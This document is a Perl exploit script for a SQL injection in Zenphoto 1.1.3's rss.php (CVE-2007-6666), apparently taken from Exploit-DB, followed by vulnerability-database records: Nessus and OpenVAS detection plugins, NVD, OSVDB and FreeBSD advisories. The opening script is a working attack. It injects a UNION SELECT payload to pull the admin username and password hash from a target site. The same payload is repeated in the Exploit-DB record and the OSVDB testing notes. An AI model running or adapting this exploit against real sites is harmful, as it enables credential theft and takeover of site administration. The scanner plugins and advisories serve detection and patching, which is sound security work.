#!/usr/bin/perl -w
#################################################################################
# #
# Zenphoto 1.1.3 SQL Injection Exploit #
# #
# Discovered by: Silentz #
# Payload: Admin Username & Hash Retrieval #
# Website: http://www.w4ck1ng.com #
# #
# Vulnerable Code (rss.php): #
# #
# $albumnr = $_GET[albumnr]; #
# #
# if ($albumnr != "") #
# { $sql = "SELECT * FROM ". prefix("images") ." WHERE albumid = $albumnr #
# AND `show` = 1 ORDER BY id DESC LIMIT ".$items;} #
# else #
# { $sql = "SELECT * FROM ". prefix("images") ." WHERE `show` = 1 ORDER #
# BY id DESC LIMIT ".$items; } #
# #
# PoC: http://victim.com/zenphoto/rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT #
# value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13) #
# ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, #
# 0,0,0,0/* #
# #
# Subject To: Nothing! #
# GoogleDork: Get your own! #
# #
# Shoutz: The entire w4ck1ng community #
# #
# NOTE: The vulnerbility exists in versions 1.1, 1.1.1, 1.1.2 & 1.1.3 BUT you'd #
# have to alter the payload in order to make it work for any versions #
# other than 1.1.3. #
# #
#################################################################################
use LWP::UserAgent;
die "Example: exploit.pl http://victim.com/\n" unless @ARGV;
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /<webMaster>(.*?)<\/webMaster>/){
print "\nBrought to you by w4ck1ng.com...\n";
print "\n[+] Admin User : $1";
}
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";}
else{print "\n[-] Exploit Failed...\n";}
# milw0rm.com [2007-12-31]
{"hash": "d3a3971100758a834c707acc1e8fba142319021e1693e31a53f4b6196c5d3601", "id": "EDB-ID:4823", "lastseen": "2016-01-31T21:51:07", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/4823/", "description": "Zenphoto 1.1.3 (rss.php albumnr) Remote SQL Injection Exploit. CVE-2007-6666. Webapps exploit for php platform", "title": "Zenphoto 1.1.3 rss.php albumnr Remote SQL Injection Exploit", "sourceData": "#!/usr/bin/perl -w\n\n#################################################################################\n# #\n# Zenphoto 1.1.3 SQL Injection Exploit #\n# #\n# Discovered by: Silentz #\n# Payload: Admin Username & Hash Retrieval #\n# Website: http://www.w4ck1ng.com #\n# #\n# Vulnerable Code (rss.php): #\n# #\n# $albumnr = $_GET[albumnr];\t\t\t\t\t\t#\n# \t \t\t\t\t\t\t\t\t\t#\n# if ($albumnr != \"\")\t\t\t\t\t\t\t#\n#\t{ $sql = \"SELECT * FROM \". prefix(\"images\") .\" WHERE albumid = $albumnr #\n# AND `show` = 1 ORDER BY id DESC LIMIT \".$items;}\t\t\t#\n# else\t\t\t\t\t\t\t\t\t#\n# \t{ $sql = \"SELECT * FROM \". prefix(\"images\") .\" WHERE `show` = 1 ORDER \t#\n# BY id DESC LIMIT \".$items; }\t\t\t\t\t\t#\n# #\n# PoC: http://victim.com/zenphoto/rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT #\n# value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13) # \n# ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, #\n# 0,0,0,0/*\t #\n# #\n# Subject To: Nothing!\t\t\t #\n# GoogleDork: Get your own! #\n# #\n# Shoutz: The entire w4ck1ng community #\n# #\n# NOTE: The vulnerbility exists in versions 1.1, 1.1.1, 1.1.2 & 1.1.3 BUT you'd #\n# have to alter the payload in order to make it work for any versions #\n# other than 1.1.3. \t\t\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t\t\t#\n#################################################################################\n\nuse LWP::UserAgent;\ndie \"Example: exploit.pl http://victim.com/\\n\" unless @ARGV;\n\n$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\n\n$host = $ARGV[0] . \"rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*\";\n\n$res = $b->request(HTTP::Request->new(GET=>$host));\n$answer = $res->content;\n\nif ($answer =~ /<webMaster>(.*?)<\\/webMaster>/){\n print \"\\nBrought to you by w4ck1ng.com...\\n\";\n print \"\\n[+] Admin User : $1\";\n}\n\nif ($answer =~/([0-9a-fA-F]{32})/){print \"\\n[+] Admin Hash : $1\\n\\n\";}\n\nelse{print \"\\n[-] Exploit Failed...\\n\";}\n\n# milw0rm.com [2007-12-31]\n", "objectVersion": "1.0", "cvelist": ["CVE-2007-6666"], "viewCount": 1, "published": "2007-12-31T00:00:00", "osvdbidlist": ["39786"], "references": [], "reporter": "Silentz", "modified": "2007-12-31T00:00:00", "href": "https://www.exploit-db.com/exploits/4823/"}
{"cve": [{"lastseen": "2017-09-29T14:25:39", "references": ["https://www.exploit-db.com/exploits/4823", "http://www.securityfocus.com/bid/27084", "https://exchange.xforce.ibmcloud.com/vulnerabilities/39341"], "description": "SQL injection vulnerability in rss.php in Zenphoto 1.1 through 1.1.3 allows remote attackers to execute arbitrary SQL commands via the albumnr parameter.", "edition": 3, "reporter": "NVD", "published": "2008-01-04T06:46:00", "title": "CVE-2007-6666", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:25:39", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2007-6666"], "scanner": [], "modified": "2017-09-28T21:30:03", "cpe": ["cpe:/a:zenphoto:zenphoto:1.1.2", "cpe:/a:zenphoto:zenphoto:1.1", "cpe:/a:zenphoto:zenphoto:1.1.3", "cpe:/a:zenphoto:zenphoto:1.1.1"], "id": "CVE-2007-6666", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6666", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-02T00:06:30", "references": ["http://www.nessus.org/u?8aa52a90", "http://www.securityfocus.com/bid/27084"], "pluginID": "30241", "description": "zenphoto project reports :\n\nA new zenphoto version is now available. This release contains security fixes for HTML, XSS, and SQL injection vulnerabilities.", "edition": 4, "reporter": "Tenable", "published": "2008-02-11T00:00:00", "title": "FreeBSD : zenphoto -- XSS vulnerability (1a818749-d646-11dc-8959-000bcdc1757a)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6666"], "modified": "2013-06-21T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:zenphoto"], "id": "FREEBSD_PKG_1A818749D64611DC8959000BCDC1757A.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=30241", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2013 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(30241);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2013/06/21 23:43:36 $\");\n\n script_cve_id(\"CVE-2007-6666\");\n script_xref(name:\"Secunia\", value:\"28281\");\n\n script_name(english:\"FreeBSD : zenphoto -- XSS vulnerability (1a818749-d646-11dc-8959-000bcdc1757a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"zenphoto project reports :\n\nA new zenphoto version is now available. This release contains\nsecurity fixes for HTML, XSS, and SQL injection vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.securityfocus.com/bid/27084\"\n );\n # http://www.freebsd.org/ports/portaudit/1a818749-d646-11dc-8959-000bcdc1757a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8aa52a90\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(89);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:zenphoto\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/01/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/02/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2013 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"zenphoto<1.1.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:56:40", "references": [], "pluginID": "29832", "description": "The version of Zenphoto installed on the remote host fails to sanitize input to the 'albumnr' parameter of the 'rss.php' script before using it in a database query. Regardless of PHP's 'magic_quotes_gpc' and 'register_globals' settings, an attacker may be able to exploit this issue to manipulate database queries, leading to disclosure of sensitive information, modification of data, or attacks against the underlying database.", "edition": 5, "reporter": "Tenable", "published": "2008-01-03T00:00:00", "title": "Zenphoto rss.php albumnr Parameter SQL Injection", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6666"], "modified": "2018-08-07T00:00:00", "cpe": ["cpe:/a:zenphoto:zenphoto"], "id": "ZENPHOTO_ALBUMNR_SQL_INJECTION.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=29832", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29832);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/08/07 16:46:50\");\n\n script_cve_id(\"CVE-2007-6666\");\n script_bugtraq_id(27084);\n script_xref(name:\"EDB-ID\", value:\"4823\");\n\n script_name(english:\"Zenphoto rss.php albumnr Parameter SQL Injection\");\n script_summary(english:\"Tries to influence the RSS results returned\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is prone to a SQL\ninjection attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Zenphoto installed on the remote host fails to sanitize\ninput to the 'albumnr' parameter of the 'rss.php' script before using\nit in a database query. Regardless of PHP's 'magic_quotes_gpc' and\n'register_globals' settings, an attacker may be able to exploit this\nissue to manipulate database queries, leading to disclosure of\nsensitive information, modification of data, or attacks against the\nunderlying database.\");\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(89);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zenphoto:zenphoto\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_dependencie(\"zenphoto_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/zenphoto\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\nurls = make_list();\nport = get_http_port(default:80, embedded: 0, php:TRUE);\ndirs = get_dirs_from_kb(port:port, appname:'zenphoto', exit_on_fail:TRUE);\n\nforeach dir (dirs)\n{\n # Try to manipulate the RSS results returned.\n magic1 = unixtime();\n magic2 = rand();\n exploit = string(\"9999 UNION SELECT 0,0,0,\", magic1, \",\", magic2, \",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\");\n\n u = string(\n dir, \"/rss.php?\",\n \"albumnr=\", urlencode(str:exploit)\n );\n\n r = http_send_recv3(port:port, method: \"GET\", item: u);\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # it's ZenPhoto and...\n \"ZenPhoto Album RSS Generator\" >< res &&\n # we see our magic in the answer.\n string(\"<title>\", magic1, \"<\") >< res &&\n string(\"/a>\", magic2, \"]]\") >< res\n )\n {\n urls = make_list(urls, u);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n }\n}\n\nif (max_index(urls) > 0)\n{\n if (report_verbosity >0)\n {\n report = get_vuln_report(items:urls, port:port);\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse exit(0, \"No vulnerable installs of Zenphoto were found on port \"+port+\".\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:35", "references": [], "description": "## Vulnerability Description\nZenphoto contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'rss.php' script not properly sanitizing user-supplied input to the 'albumnr' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/zenphoto/rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*\n## References:\n[Secunia Advisory ID:28281](https://secuniaresearch.flexerasoftware.com/advisories/28281/)\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4823\n[CVE-2007-6666](https://vulners.com/cve/CVE-2007-6666)\nBugtraq ID: 27084\n", "edition": 1, "reporter": "OSVDB", "published": "2007-12-31T00:00:00", "title": "Zenphoto rss.php albumnr Variable SQL Injection", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-6666"], "modified": "2007-12-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39786", "id": "OSVDB:39786", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:21", "references": [], "pluginID": "60396", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-04T00:00:00", "title": "FreeBSD Ports: zenphoto", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6666"], "modified": "2016-10-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=60396", "id": "OPENVAS:60396", "sourceData": "#\n#VID 1a818749-d646-11dc-8959-000bcdc1757a\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: zenphoto\n\nCVE-2007-6666\nSQL injection vulnerability in rss.php in Zenphoto 1.1 through 1.1.3\nallows remote attackers to execute arbitrary SQL commands via the\nalbumnr parameter.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.securityfocus.com/bid/27084\nhttp://secunia.com/advisories/28281\nhttp://www.vuxml.org/freebsd/1a818749-d646-11dc-8959-000bcdc1757a.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(60396);\n script_version(\"$Revision: 4218 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-10-05 16:20:48 +0200 (Wed, 05 Oct 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2007-6666\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: zenphoto\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"zenphoto\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.1.4\")<0) {\n txt += 'Package zenphoto version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:36", "references": ["http://www.securityfocus.com/bid/27084", "http://secunia.com/advisories/28281"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.1.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "zenphoto", "operator": "lt"}], "description": "\nzenphoto project reports:\n\nA new zenphoto version is now available. This release contains\n\t security fixes for HTML, XSS, and SQL injection vulnerabilities.\n\t \n\n", "edition": 3, "reporter": "FreeBSD", "published": "2008-01-03T00:00:00", "title": "zenphoto -- XSS vulnerability", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2007-6666"], "modified": "2008-01-03T00:00:00", "id": "1A818749-D646-11DC-8959-000BCDC1757A", "href": "https://vuxml.freebsd.org/freebsd/1a818749-d646-11dc-8959-000bcdc1757a.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
